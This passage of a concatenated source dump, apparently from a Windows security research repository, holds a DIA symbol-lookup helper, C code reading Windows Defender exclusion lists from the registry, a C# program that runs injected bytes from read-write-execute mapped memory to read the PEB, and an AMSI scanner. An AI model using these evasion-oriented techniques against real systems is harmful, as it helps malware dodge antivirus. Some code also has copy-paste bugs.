10 | Documentation available at: https://docs.microsoft.com/en-us/visualstudio/debugger/debug-interface-access/debug-interface-access-sdk
11 | Most of the code is based on the Dia2Dump code sample shipped with the MS DIA SDK.
12 | ================================================================================================+*/
13 |
14 | #include
15 | #include
16 |
17 | #include "interface.h"
18 |
19 | // e6756135-1e65-4d17-8576-610761398c3c
20 | CONST CLSID CLSID_DiaSource = {
21 | 0xe6756135, 0x1e65, 0x4d17, { 0x85, 0x76, 0x61, 0x07, 0x61, 0x39, 0x8c, 0x3c }
22 | };
23 |
24 | // 79F1BB5F-B66E-48e5-B6A9-1545C323CA3D
25 | CONST IID IID_IDiaDataSource = {
26 | 0x79F1BB5F, 0xB66E, 0x48e5, { 0xB6, 0xA9, 0x15, 0x45, 0xC3, 0x23, 0xCA, 0x3D }
27 | };
28 |
29 | // Global Data Source COM interface
30 | IDiaDataSource* g_DataSource = NULL;
31 |
32 | // Global Session COM interface
33 | IDiaSession* g_Session = NULL;
34 |
35 | // Global Symbol COM interface
36 | IDiaSymbol* g_GlobalSymbol = NULL;
37 |
38 | // Global Callback COM interface
39 | IDiaLoadCallback2* g_Callback = NULL;
40 |
41 |
42 | _Use_decl_annotations_
43 | HRESULT STDMETHODCALLTYPE DiaInitialise(
44 | _In_ PWCHAR DllName
45 | ) {
46 | // Check if already initialised
47 | HRESULT Result = S_OK;
48 | if (g_DataSource != NULL)
49 | return Result;
50 |
51 | // Initialise COM runtime
52 | if (!SUCCEEDED(CoInitialize(NULL)))
53 | return E_FAIL;
54 |
55 | // Load the module
56 | HMODULE hModule = LoadLibraryExW(GetMsdiaModulePath(), NULL, LOAD_WITH_ALTERED_SEARCH_PATH);
57 | if (hModule == NULL)
58 | return E_FAIL;
59 | ResetDirectory();
60 |
61 | // Get exported routine
62 | TDllGetClassObject DllGetClassObject = (TDllGetClassObject)GetProcAddress(hModule, "DllGetClassObject");
63 | if (DllGetClassObject == NULL)
64 | return GetLastError();
65 |
66 | // Create Instance of the IDiaDataSource COM interface
67 | IClassFactory* ClassFactory = NULL;
68 | if (SUCCEEDED(DllGetClassObject(&CLSID_DiaSource, &IID_IClassFactory, (LPVOID*)&ClassFactory))) {
69 | Result = ClassFactory->lpVtbl->CreateInstance(ClassFactory, NULL, &IID_IDiaDataSource, &g_DataSource);
70 | if (SUCCEEDED(Result))
71 | ClassFactory->lpVtbl->AddRef(ClassFactory);
72 | return Result;
73 | }
74 | else {
75 | HRESULT Result = GetLastError();
76 | if (Result > 0x00)
77 | Result |= REASON_LEGACY_API;
78 | return Result;
79 | }
80 | }
81 |
82 |
83 | _Use_decl_annotations_
84 | VOID STDMETHODCALLTYPE DiaUninitialise() {
85 | if (g_GlobalSymbol != NULL) {
86 | g_GlobalSymbol->lpVtbl->Release(g_GlobalSymbol);
87 | g_GlobalSymbol = NULL;
88 | }
89 |
90 | if (g_Session != NULL) {
91 | g_Session->lpVtbl->Release(g_Session);
92 | g_Session = NULL;
93 | }
94 |
95 | if (g_DataSource != NULL) {
96 | g_DataSource->lpVtbl->Release(g_DataSource);
97 | g_DataSource = NULL;
98 | }
99 |
100 | if (g_Callback != NULL) {
101 | g_Callback->lpVtbl->Release(g_Callback);
102 | g_Callback = NULL;
103 | }
104 |
105 | CoUninitialize();
106 | }
107 |
108 |
109 | _Use_decl_annotations_
110 | HRESULT STDMETHODCALLTYPE DiaLoadDataFromPdb(
111 | _In_ PWCHAR FilePath
112 | ) {
113 | // Check if already initialised
114 | if (g_DataSource == NULL)
115 | return E_FAIL;
116 | HRESULT Result = S_OK;
117 |
118 | // Extract the file extension from the path
119 | PWCHAR FileExtension = calloc(1, MAX_PATH * sizeof(WCHAR));
120 | if (FileExtension == NULL)
121 | return E_OUTOFMEMORY;
122 | _wsplitpath_s(FilePath, NULL, 0, NULL, 0, NULL, 0, FileExtension, MAX_PATH);
123 |
124 | // File is a ".PDB"
125 | if (!_wcsicmp(FileExtension, L".pdb")) {
126 | free(FileExtension);
127 |
128 | Result = g_DataSource->lpVtbl->loadDataFromPdb(g_DataSource, FilePath);
129 | if (FAILED(Result)) {
130 | wprintf(L"[-] Failed to load data from the PDB file (%08X).\r\n", Result);
131 | return Result;
132 | }
133 | }
134 | // File is a ".EXE"
135 | else if(!_wcsicmp(FileExtension, L".exe")) {
136 | free(FileExtension);
137 |
138 | // Create the callback COM implementation
139 | if (FAILED(DiaCallbackHelper(TRUE, (PVOID)&g_Callback))) {
140 | wprintf(L"[-] Failed to create the DIA Callback.\r\n");
141 | return E_FAIL;
142 | }
143 | g_Callback->lpVtbl->AddRef(g_Callback);
144 |
145 | // Forge the Symbol search path
146 | ChangeDirectory(L"pdb", 4);
147 |
148 | // Load the PDB from Microsoft symbol server
149 | Result = g_DataSource->lpVtbl->loadDataForExe(
150 | g_DataSource,
151 | FilePath,
152 | GetSymSrvSearchPath(),
153 | (PVOID)g_Callback
154 | );
155 | if (FAILED(Result)) {
156 | wprintf(L"[-] Failed to load PDB file (%08X).\r\n", Result);
157 | ResetDirectory();
158 |
159 | g_Callback->lpVtbl->Release(g_Callback);
160 | return Result;
161 | }
162 |
163 | ResetDirectory();
164 | }
165 |
166 | // Open session to access symbols
167 | Result = g_DataSource->lpVtbl->openSession(g_DataSource, &g_Session);
168 | if (FAILED(Result)) {
169 | wprintf(L"[-] Failed to open session (%08X).\r\n", Result);
170 | return Result;
171 | }
172 |
173 | // Get the global scope
174 | Result = g_Session->lpVtbl->get_globalScope(g_Session, &g_GlobalSymbol);
175 | if (FAILED(Result)) {
176 | wprintf(L"[-] Failed to get global scope (%08X).\r\n", Result);
177 | return Result;
178 | }
179 |
180 | return Result;
181 | }
182 |
183 |
184 | _Use_decl_annotations_
185 | HRESULT STDMETHODCALLTYPE DiaFindPublicSymbols(
186 | _In_ PUBLIC_SYMBOL PublicSymbols[],
187 | _In_ DWORD Elements
188 | ) {
189 | // Check if everything has been properly initialised.
190 | if (g_DataSource == NULL || g_Session == NULL || g_GlobalSymbol == NULL)
191 | return E_FAIL;
192 |
193 | // Enumerates the various symbols contained in the data source.
194 | IDiaEnumSymbols* EnumSymbols = NULL;
195 | HRESULT Result = g_GlobalSymbol->lpVtbl->findChildren(
196 | g_GlobalSymbol,
197 | SymTagPublicSymbol,
198 | NULL,
199 | nsNone,
200 | &EnumSymbols
201 | );
202 | if (FAILED(Result)) {
203 | wprintf(L"[-] Failed to load symbol enumerator (%08X).\r\n", Result);
204 | return Result;
205 | }
206 |
207 | // Parse all symbols
208 | IDiaSymbol* Symbol = NULL;
209 | ULONG celt = 0x00;
210 | while (SUCCEEDED(EnumSymbols->lpVtbl->Next(EnumSymbols, 0x01, &Symbol, &celt)) && (celt == 1)) {
211 |
212 | DWORD dwTag = 0x00;
213 | DWORD dwRVA = 0x00;
214 | DWORD dwOff = 0x00;
215 | DWORD dwSeg = 0x00;
216 | BSTR Name = NULL;
217 |
218 | // Make sure we have a tag for the symbol
219 | if (FAILED(Symbol->lpVtbl->get_symTag(Symbol, &dwTag)))
220 | goto next_symbol;
221 |
222 | // Get the name of the global variable
223 | if (SUCCEEDED(Symbol->lpVtbl->get_name(Symbol, &Name))) {
224 |
225 | // Find the symbol
226 | BOOLEAN Found = FALSE;
227 | DWORD Index = 0x00;
228 | for (DWORD cx = 0x00; cx < Elements; cx++) {
229 | if (wcscmp(PublicSymbols[cx].Name, Name) == 0x00) {
230 | Index = cx;
231 | Found = TRUE;
232 | break;
233 | }
234 | }
235 | if (!Found)
236 | goto next_symbol;
237 |
238 | // Get the Relative Virtual Address (RVA), the offset and section
239 | if (FAILED(Symbol->lpVtbl->get_relativeVirtualAddress(Symbol, &dwRVA)))
240 | dwRVA = 0xFFFFFFFF;
241 | Symbol->lpVtbl->get_addressSection(Symbol, &dwSeg);
242 | Symbol->lpVtbl->get_addressOffset(Symbol, &dwOff);
243 |
244 | PublicSymbols[Index].dwTag = dwTag;
245 | PublicSymbols[Index].dwRVA = dwRVA;
246 | PublicSymbols[Index].dwOff = dwOff;
247 | PublicSymbols[Index].dwSeg = dwSeg;
248 |
249 | // Release current interface
250 | next_symbol:
251 | Symbol->lpVtbl->Release(Symbol);
252 | }
253 | }
254 | EnumSymbols->lpVtbl->Release(EnumSymbols);
255 | return S_OK;
256 | }
--------------------------------------------------------------------------------
/Defender/ExclusionLists/src/defender.c:
--------------------------------------------------------------------------------
1 | /**
2 | * @file defender.c
3 | * @author Paul L. (@am0nsec)
4 | * @version 1.0
5 | * @brief Windows Defender exclusion list source.
6 | * @details
7 | * @link https://github.com/am0nsec/wspe
8 | * @copyright This project has been released under the GNU Public License v3 license.
9 | */
10 |
11 | #include
12 |
13 | #include "defender.h"
14 |
15 | _Use_decl_annotations_
16 | HRESULT STDMETHODCALLTYPE DfdGetAllExclusions(
17 | _Out_ PDEFENDER_EXCLUSION_LIST pExclusionsList
18 | ) {
19 | if (pExclusionsList == NULL)
20 | return E_INVALIDARG;
21 |
22 | // Open and handle to the following windows Registry key:
23 | // Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions
24 | HKEY hExclusionList = INVALID_HANDLE_VALUE;
25 | LSTATUS Status = RegOpenKeyA(
26 | HKEY_LOCAL_MACHINE,
27 | "SOFTWARE\\Microsoft\\Windows Defender\\Exclusions",
28 | &hExclusionList
29 | );
30 | if (Status != ERROR_SUCCESS || hExclusionList == INVALID_HANDLE_VALUE)
31 | return E_FAIL;
32 |
33 | // Get handle to the process heap for memory allocation
34 | HANDLE hHeap = GetProcessHeap();
35 |
36 | // Build a local copy of the final structure.
37 | DEFENDER_EXCLUSION_LIST ExclusionList = { 0x00 };
38 |
39 | // Prepare local variables
40 | HRESULT Result = S_OK;
41 | DWORD dwNumberOfValues = 0x00;
42 |
43 | // Get extensions
44 | ExclusionList.Extensions = HeapAlloc(hHeap, HEAP_ZERO_MEMORY, sizeof(DEFENDER_EXCLUSION_ENTRY));
45 | Result = DfdpGetExclusionEntries(
46 | ExclusionList.Extensions,
47 | "Extensions",
48 | DefenderExclusionExtensions,
49 | &hExclusionList,
50 | &hHeap,
51 | &dwNumberOfValues
52 | );
53 | if (Result != S_OK || dwNumberOfValues == 0x00) {
54 | HeapFree(hHeap, 0x00, ExclusionList.Extensions);
55 | ExclusionList.Extensions = NULL;
56 | }
57 |
58 | // Get IpAddresses
59 | ExclusionList.IpAddresses = HeapAlloc(hHeap, HEAP_ZERO_MEMORY, sizeof(DEFENDER_EXCLUSION_ENTRY));
60 | Result = DfdpGetExclusionEntries(
61 | ExclusionList.IpAddresses,
62 | "IpAddresses",
63 | DefenderExclusionIpAddress,
64 | &hExclusionList,
65 | &hHeap,
66 | &dwNumberOfValues
67 | );
68 | if (Result != S_OK || dwNumberOfValues == 0x00) {
69 | HeapFree(hHeap, 0x00, ExclusionList.IpAddresses);
70 | ExclusionList.IpAddresses = NULL;
71 | }
72 |
73 | // Get paths
74 | ExclusionList.Paths = HeapAlloc(hHeap, HEAP_ZERO_MEMORY, sizeof(DEFENDER_EXCLUSION_ENTRY));
75 | Result = DfdpGetExclusionEntries(
76 | ExclusionList.Paths,
77 | "Paths",
78 | DefenderExclusionPaths,
79 | &hExclusionList,
80 | &hHeap,
81 | &dwNumberOfValues
82 | );
83 | if (Result != S_OK || dwNumberOfValues == 0x00) {
84 | HeapFree(hHeap, 0x00, ExclusionList.Paths);
85 | ExclusionList.Paths = NULL;
86 | }
87 |
88 | // Get processes
89 | ExclusionList.Processes = HeapAlloc(hHeap, HEAP_ZERO_MEMORY, sizeof(DEFENDER_EXCLUSION_ENTRY));
90 | Result = DfdpGetExclusionEntries(
91 | ExclusionList.Processes,
92 | "Processes",
93 | DefenderExclusionProcesses,
94 | &hExclusionList,
95 | &hHeap,
96 | &dwNumberOfValues
97 | );
98 | if (Result != S_OK || dwNumberOfValues == 0x00) {
99 | HeapFree(hHeap, 0x00, ExclusionList.Extensions);
100 | ExclusionList.Extensions = NULL;
101 | }
102 |
103 | // Get temporary paths
104 | ExclusionList.TemporaryPaths = HeapAlloc(hHeap, HEAP_ZERO_MEMORY, sizeof(DEFENDER_EXCLUSION_ENTRY));
105 | Result = DfdpGetExclusionEntries(
106 | ExclusionList.TemporaryPaths,
107 | "TemporaryPaths",
108 | DefenderExclusionTemporaryPaths,
109 | &hExclusionList,
110 | &hHeap,
111 | &dwNumberOfValues
112 | );
113 | if (Result != S_OK || dwNumberOfValues == 0x00) {
114 | HeapFree(hHeap, 0x00, ExclusionList.TemporaryPaths);
115 | ExclusionList.TemporaryPaths = NULL;
116 | }
117 |
118 | // Cleanup and return data
119 | RegCloseKey(hExclusionList);
120 | *pExclusionsList = ExclusionList;
121 | return S_OK;
122 | }
123 |
124 | _Use_decl_annotations_
125 | HRESULT STDMETHODCALLTYPE DfdpGetExclusionEntries(
126 | _In_ PDEFENDER_EXCLUSION_ENTRY pExclusionEntry,
127 | _In_ LPCSTR szSubKeyName,
128 | _In_ CONST DEFENDER_EXCLUSION_TYPE Type,
129 | _In_ CONST PHKEY pParentKey,
130 | _In_ CONST PHANDLE phHeap,
131 | _Out_ PDWORD pdwNumberOfValues
132 | ) {
133 | if (pExclusionEntry == NULL
134 | || szSubKeyName == NULL
135 | || pParentKey == NULL
136 | || *pParentKey == INVALID_HANDLE_VALUE
137 | || phHeap == NULL)
138 | return E_INVALIDARG;
139 |
140 | // Open an handle to the subkey
141 | HKEY hSubKey = INVALID_HANDLE_VALUE;
142 | LSTATUS Status = RegOpenKeyA(
143 | *pParentKey,
144 | szSubKeyName,
145 | &hSubKey
146 | );
147 | if (Status != ERROR_SUCCESS || hSubKey == INVALID_HANDLE_VALUE)
148 | return E_FAIL;
149 |
150 | // Get all the number of values stored in the Registry key
151 | DWORD dwMaxValueNameLength = 0x00;
152 |
153 | Status = RegQueryInfoKeyA(
154 | hSubKey,
155 | NULL,
156 | NULL,
157 | NULL,
158 | NULL,
159 | NULL,
160 | NULL,
161 | pdwNumberOfValues,
162 | &dwMaxValueNameLength,
163 | NULL,
164 | NULL,
165 | NULL
166 | );
167 | if (Status != ERROR_SUCCESS) {
168 | RegCloseKey(hSubKey);
169 | return E_FAIL;
170 | }
171 | if (*pdwNumberOfValues == 0x00)
172 | return S_OK;
173 | dwMaxValueNameLength++;
174 |
175 | // Save previous entry
176 | PDEFENDER_EXCLUSION_ENTRY Blink = NULL;
177 |
178 | // Get all the values one by one
179 | for (DWORD cx = 0x00; cx < *pdwNumberOfValues; cx++) {
180 |
181 | // Allocate memory for a new entry
182 | PDEFENDER_EXCLUSION_ENTRY ExclusionEntry = NULL;
183 | if (cx == 0x00) {
184 | ExclusionEntry = pExclusionEntry;
185 | }
186 | else {
187 | ExclusionEntry = HeapAlloc(*phHeap, HEAP_ZERO_MEMORY, sizeof(DEFENDER_EXCLUSION_ENTRY));
188 | }
189 | ExclusionEntry->Exclusion = HeapAlloc(*phHeap, HEAP_ZERO_MEMORY, dwMaxValueNameLength);
190 |
191 | // Get the value name
192 | DWORD dwBufferSize = dwMaxValueNameLength;
193 | Status = RegEnumValueA(hSubKey, cx, ExclusionEntry->Exclusion, &dwBufferSize, NULL, NULL, NULL, NULL);
194 | if (Status != ERROR_SUCCESS) {
195 | HeapFree(*phHeap, 0x00, ExclusionEntry->Exclusion);
196 | HeapFree(*phHeap, 0x00, ExclusionEntry);
197 | RegCloseKey(hSubKey);
198 | return E_FAIL;
199 | }
200 |
201 | // Allocate memory for the double-linked list
202 | ExclusionEntry->Type = Type;
203 | ExclusionEntry->Length = dwBufferSize;
204 |
205 | // Create chain
206 | if (Blink != NULL) {
207 | ExclusionEntry->Blink = Blink;
208 | ((PDEFENDER_EXCLUSION_ENTRY)ExclusionEntry->Blink)->Flink = ExclusionEntry;
209 | }
210 | Blink = ExclusionEntry;
211 | }
212 |
213 | RegCloseKey(hSubKey);
214 | return S_OK;
215 |
216 |
217 |
218 |
219 |
220 |
221 |
222 |
223 |
224 |
225 |
226 |
227 |
228 |
229 | //// Allocate memory for first entry
230 |
231 |
232 | //// Extract all the entries
233 | //HRESULT Result = DfdpGetExclusionEntries(
234 | // pExclusionEntry,
235 | // DefenderExclusionExtensions,
236 | // &hSubKey,
237 | // phHeap
238 | //);
239 | //if (Result != S_OK) {
240 | // HeapFree(*phHeap, 0x00, pExclusionsList->Extensions);
241 | // return E_FAIL;
242 | //}
243 | //return S_OK;
244 | }
245 |
246 | _Use_decl_annotations_
247 | HRESULT STDMETHODCALLTYPE DfdpCleanup(
248 | _In_ PDEFENDER_EXCLUSION_LIST pExclusionsList
249 | ) {
250 | if (pExclusionsList == NULL)
251 | return E_FAIL;
252 |
253 | // Get handle to process heap
254 | HANDLE hHeap = GetProcessHeap();
255 |
256 | // Clean all the memory allocated
257 | for (DWORD cx = 0x00; cx < (sizeof(DEFENDER_EXCLUSION_LIST) / sizeof(PVOID)); cx++) {
258 | PDEFENDER_EXCLUSION_ENTRY Entry = *(PUINT64)((PBYTE)pExclusionsList + (8 * cx));
259 | while (Entry != NULL) {
260 | HeapFree(hHeap, 0x00, Entry->Exclusion);
261 | if (Entry->Blink != NULL)
262 | HeapFree(hHeap, 0x00, Entry->Blink);
263 | if (Entry->Flink == NULL) {
264 | HeapFree(hHeap, 0x00, Entry);
265 | break;
266 | }
267 | Entry = Entry->Flink;
268 | }
269 | }
270 |
271 | ZeroMemory(pExclusionsList, sizeof(DEFENDER_EXCLUSION_LIST));
272 | return S_OK;
273 | }
--------------------------------------------------------------------------------
/RWX/MMF/MMF/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Diagnostics;
3 | using System.IO.MemoryMappedFiles;
4 | using System.Runtime.InteropServices;
5 |
6 | namespace MMF {
7 | internal sealed class Program {
8 |
9 | ///
10 | /// Used for mutual-exclusion lock. 7
11 | ///
12 | private static object Mutex { get; } = new object();
13 |
14 | ///
15 | /// Delegate used to get the address of the PEB structure.
16 | ///
17 | /// Address of the PEB structure.
18 | private delegate IntPtr GetPEBDelegate();
19 |
20 | ///
21 | /// Program entry point.
22 | ///
23 | /// Command line arguments.
24 | static void Main(string[] args) {
25 | Span asm = stackalloc byte[10] {
26 | 0x65, 0x48, 0x8B, 0x04, 0x25, 0x60, 0x00, 0x00, 0x00, // MOV RAX, GS:[0x60]
27 | 0xC3 // RET
28 | };
29 |
30 | IntPtr PEBAddressPtr = IntPtr.Zero;
31 | lock (Mutex) {
32 | using MemoryMappedFile MemoryMap = MemoryMappedFile.CreateNew(null, asm.Length, MemoryMappedFileAccess.ReadWriteExecute);
33 | MemoryMappedViewAccessor MemoryMapAccessor = MemoryMap.CreateViewAccessor(0, asm.Length, MemoryMappedFileAccess.ReadWriteExecute);
34 |
35 | // Get address of the memory region
36 | IntPtr RWXRegionAddressPtr = MemoryMapAccessor.SafeMemoryMappedViewHandle.DangerousGetHandle();
37 | Debug.Assert(RWXRegionAddressPtr != IntPtr.Zero, "[-] Error while retrieving the address of the RWX memory region.");
38 |
39 | // Inject code
40 | Marshal.Copy(asm.ToArray(), 0, RWXRegionAddressPtr, asm.Length);
41 | Debug.Assert(Marshal.ReadByte(RWXRegionAddressPtr, 0) == 0x65, "[-] Error while injecting code.");
42 | Debug.Assert(Marshal.ReadByte(RWXRegionAddressPtr, 9) == 0xC3, "[-] Error while injecting code.");
43 |
44 | // Get delegate
45 | GetPEBDelegate GetPEB = Marshal.GetDelegateForFunctionPointer(RWXRegionAddressPtr);
46 | PEBAddressPtr = GetPEB();
47 | Debug.Assert(PEBAddressPtr != IntPtr.Zero, "[-] Error while retrieving the address of the PEB structure.");
48 | }
49 |
50 | // Pull the structure out of memory
51 | PEB _PEB = Marshal.PtrToStructure(PEBAddressPtr);
52 | Debug.Assert(_PEB.Equals(default(PEB)), "[-] Error while pulling out the structure from memory");
53 | }
54 | }
55 |
56 | [StructLayout(LayoutKind.Sequential, Pack = 1)]
57 | internal struct UNICODE_STRING {
58 | public ushort Length;
59 | public ushort MaximumLength;
60 | public IntPtr Buffer;
61 | }
62 |
63 | [StructLayout(LayoutKind.Sequential, Pack = 1)]
64 | internal struct LIST_ENTRY {
65 | public IntPtr Flink;
66 | public IntPtr Blink;
67 | }
68 |
69 | [StructLayout(LayoutKind.Sequential, Pack = 1)]
70 | internal struct PEB {
71 | public byte InheritedAddressSpace;
72 | public byte ReadImageFileExecOptions;
73 | public byte BeingDebugged;
74 | public byte BitField;
75 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
76 | public byte[] Padding0;
77 | public IntPtr Mutant;
78 | public IntPtr ImageBaseAddress;
79 | public IntPtr Ldr;
80 | public IntPtr ProcessParameters;
81 | public IntPtr SubSystemData;
82 | public IntPtr ProcessHeap;
83 | public IntPtr FastPebLock;
84 | public IntPtr AtlThunkSListPtr;
85 | public IntPtr IFEOKey;
86 | public uint CrossProcessFlags;
87 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
88 | public byte[] Padding1;
89 | public IntPtr KernelCallbackTable;
90 | public uint SystemReserved;
91 | public uint AtlThunkSListPtr32;
92 | public IntPtr ApiSetMap;
93 | public uint TlsExpansionCounter;
94 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
95 | public byte[] Padding2;
96 | public IntPtr TlsBitmap;
97 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = 2)]
98 | public uint[] TlsBitmapBits;
99 | public IntPtr ReadOnlySharedMemoryBase;
100 | public IntPtr SharedData;
101 | public IntPtr ReadOnlyStaticServerData;
102 | public IntPtr AnsiCodePageData;
103 | public IntPtr OemCodePageData;
104 | public IntPtr UnicodeCaseTableData;
105 | public uint NumberOfProcessors;
106 | public uint NtGlobalFlag;
107 | public ulong CriticalSectionTimeout;
108 | public ulong HeapSegmentReserve;
109 | public ulong HeapSegmentCommit;
110 | public ulong HeapDeCommitTotalFreeThreshold;
111 | public ulong HeapDeCommitFreeBlockThreshold;
112 | public uint NumberOfHeaps;
113 | public uint MaximumNumberOfHeaps;
114 | public IntPtr ProcessHeaps;
115 | public IntPtr GdiSharedHandleTable;
116 | public IntPtr ProcessStarterHelper;
117 | public uint GdiDCAttributeList;
118 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
119 | public byte[] Padding3;
120 | public IntPtr LoaderLock;
121 | public uint OSMajorVersion;
122 | public uint OSMinorVersion;
123 | public ushort OSBuildNumber;
124 | public ushort OSCSDVersion;
125 | public uint OSPlatformId;
126 | public uint ImageSubsystem;
127 | public uint ImageSubsystemMajorVersion;
128 | public uint ImageSubsystemMinorVersion;
129 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
130 | public byte[] Padding4;
131 | public ulong ActiveProcessAffinityMask;
132 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = 60)]
133 | public uint[] GdiHandleBuffer;
134 | public IntPtr PostProcessInitRoutine;
135 | public IntPtr TlsExpansionBitmap;
136 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = 32)]
137 | public uint[] TlsExpansionBitmapBits;
138 | public uint SessionId;
139 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
140 | public byte[] Padding5;
141 | public ulong AppCompatFlags;
142 | public ulong AppCompatFlagsUser;
143 | public IntPtr pShimData;
144 | public IntPtr AppCompatInfo;
145 | public UNICODE_STRING CSDVersion;
146 | public IntPtr ActivationContextData;
147 | public IntPtr ProcessAssemblyStorageMap;
148 | public IntPtr SystemDefaultActivationContextData;
149 | public IntPtr SystemAssemblyStorageMap;
150 | public ulong MinimumStackCommit;
151 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
152 | public IntPtr[] SparePointers;
153 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = 6)]
154 | public uint[] SpareUlongs;
155 | public IntPtr WerRegistrationData;
156 | public IntPtr WerShipAssertPtr;
157 | public IntPtr pUnused;
158 | public IntPtr pImageHeaderHash;
159 | public uint TracingFlags;
160 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
161 | public byte[] Padding6;
162 | public ulong CsrServerReadOnlySharedMemoryBase;
163 | public ulong TppWorkerpListLock;
164 | public LIST_ENTRY TppWorkerpList;
165 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = 128)]
166 | public ulong[] WaitOnAddressHashTable;
167 | public IntPtr TelemetryCoverageHeader;
168 | public uint CloudFileFlags;
169 | public uint CloudFileDiagFlags;
170 | public byte PlaceholderCompatibilityMode;
171 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = 7)]
172 | public byte[] PlaceholderCompatibilityModeReserved;
173 | public IntPtr LeapSecondData;
174 | public uint LeapSecondFlags;
175 | public uint NtGlobalFlag2;
176 | }
177 | }
178 |
--------------------------------------------------------------------------------
/AMSI/amsi_scanner.c:
--------------------------------------------------------------------------------
1 | /*+===================================================================
2 | File: amsi_scanner.c
3 | Summary: Scan string, file or URL via AMSI.
4 | Classes: N/A
5 | Functions: N/A
6 | Origin: https://github.com/am0nsec
7 | ##
8 | Author: Paul Laine (@am0nsec)
9 | ===================================================================+*/
10 | #pragma once
11 | #include
12 | #include
13 | #include
14 |
15 | #pragma comment(lib, "amsi.lib")
16 |
17 | /*--------------------------------------------------------------------
18 | Function prototypes.
19 | --------------------------------------------------------------------*/
20 | BOOL GetStringLenght(_In_ LPWSTR szString, _Out_ PULONG plStringSize);
21 | BOOL ScanString(_In_ LPWSTR* pszString, _Out_ AMSI_RESULT* pAmsiResult);
22 | BOOL ScanFile(_In_ LPWSTR* pszFileName, _Out_ AMSI_RESULT* pAmsiResult);
23 | BOOL ScanUrl(_In_ LPWSTR* pszUrl, _Out_ AMSI_RESULT* pAmsiResult);
24 | VOID Cleanup();
25 |
26 | /*--------------------------------------------------------------------
27 | Global variables.
28 | --------------------------------------------------------------------*/
29 | HAMSICONTEXT g_hAmsiContext = NULL;
30 | HAMSISESSION g_hAmsiSession = NULL;
31 | LPCWSTR g_szApplicationName = L"AMSI Scanner v1.0";
32 | HANDLE g_hProcessHeap = INVALID_HANDLE_VALUE;
33 |
34 | INT wmain(INT argc, PWCHAR argv[]) {
35 | wprintf(L"[>] Copyright (C) 2020 Paul Laine (@am0nsec)\n");
36 | wprintf(L"[>] AMSI Scanner v1.0\n");
37 | wprintf(L"[>] https://github.com/am0nsec/wspe\n");
38 | wprintf(L" -----------------------------------------\n\n");
39 |
40 | // Check arguments supplied by the user
41 | if (argc < 3 || (argc >= 2 && wcscmp(argv[1], L"-h") == 0)) {
42 | wprintf(L"[-] Usage: scanner [ -f | -s | -u ] [data]\n");
43 | wprintf(L"\t-f\tScan content of a file.\n");
44 | wprintf(L"\t-s\tScan a string.\n");
45 | wprintf(L"\t-u\tScan an URL.\n\n");
46 |
47 | wprintf(L"Leverage the Antimalware Scan Interface (AMSI) Win32 API to scan user supplied content.\n");
48 | wprintf(L"Microsoft documentation: https://docs.microsoft.com/en-us/windows/win32/api/_amsi/\n\n");
49 | return 0x01;
50 | }
51 |
52 | // Initialise variables
53 | HRESULT hr = S_OK;
54 | g_hProcessHeap = GetProcessHeap();
55 |
56 | // Initialise AMSI
57 | hr = AmsiInitialize(g_szApplicationName, &g_hAmsiContext);
58 | if (FAILED(hr)) {
59 | wprintf(L"[-] Error while invoking amsi!AmsiInitialize (0x%08x)\n", hr);
60 | wprintf(L"[-] Check that Windows Defender is enabled or that the currently running AV support AMSI.\n");
61 | return 0x01;
62 | }
63 |
64 | // Open new session
65 | hr = AmsiOpenSession(g_hAmsiContext, &g_hAmsiSession);
66 | if (FAILED(hr)) {
67 | wprintf(L"[-] Error while invoking amsi!AmsiOpenSession (0x%08x)\n", hr);
68 | Cleanup();
69 | return 0x01;
70 | }
71 |
72 | // Scan data
73 | AMSI_RESULT AmsiResult;
74 | BOOL bScanSuccess = FALSE;
75 | if (wcscmp(argv[1], L"-s") == 0)
76 | bScanSuccess = ScanString(&argv[2], &AmsiResult);
77 | else if (wcscmp(argv[1], L"-u") == 0)
78 | bScanSuccess = ScanString(&argv[2], &AmsiResult);
79 | else if (wcscmp(argv[1], L"-f") == 0)
80 | bScanSuccess = ScanFile(&argv[2], &AmsiResult);
81 |
82 | // Display result of the scan
83 | if (bScanSuccess) {
84 | switch (AmsiResult) {
85 | case AMSI_RESULT_CLEAN:
86 | wprintf(L"[>] Scan score: %d (AMSI_RESULT_CLEAN)\n", AmsiResult);
87 | wprintf(L"Known good. No detection found, and the result is likely not going to change after a future definition update.\n\n");
88 | break;
89 | case AMSI_RESULT_NOT_DETECTED:
90 | wprintf(L"[>] Scan score: %d (AMSI_RESULT_NOT_DETECTED)\n", AmsiResult);
91 | wprintf(L"No detection found, but the result might change after a future definition update.\n\n");
92 | break;
93 | case AMSI_RESULT_BLOCKED_BY_ADMIN_START:
94 | wprintf(L"[>] Scan score: %d (AMSI_RESULT_BLOCKED_BY_ADMIN_START)\n", AmsiResult);
95 | wprintf(L"Administrator policy blocked this content on this machine (beginning of range).\n\n");
96 | break;
97 | case AMSI_RESULT_BLOCKED_BY_ADMIN_END:
98 | wprintf(L"[>] Scan score: %d (AMSI_RESULT_BLOCKED_BY_ADMIN_END)\n", AmsiResult);
99 | wprintf(L"Administrator policy blocked this content on this machine (end of range).\n\n");
100 | break;
101 | case AMSI_RESULT_DETECTED:
102 | wprintf(L"[>] Scan score: %d (AMSI_RESULT_DETECTED)\n", AmsiResult);
103 | wprintf(L"Detection found. The content is considered malware and should be blocked.\n\n");
104 | break;
105 | }
106 | }
107 |
108 | // Cleanup
109 | Cleanup();
110 | return 0x00;
111 | }
112 |
113 | BOOL GetStringLenght(LPWSTR szString, PULONG plStringSize) {
114 | if (!szString) {
115 | plStringSize = 0;
116 | return FALSE;
117 | }
118 |
119 | while (*szString++ != '\0')
120 | *plStringSize += sizeof(WCHAR);
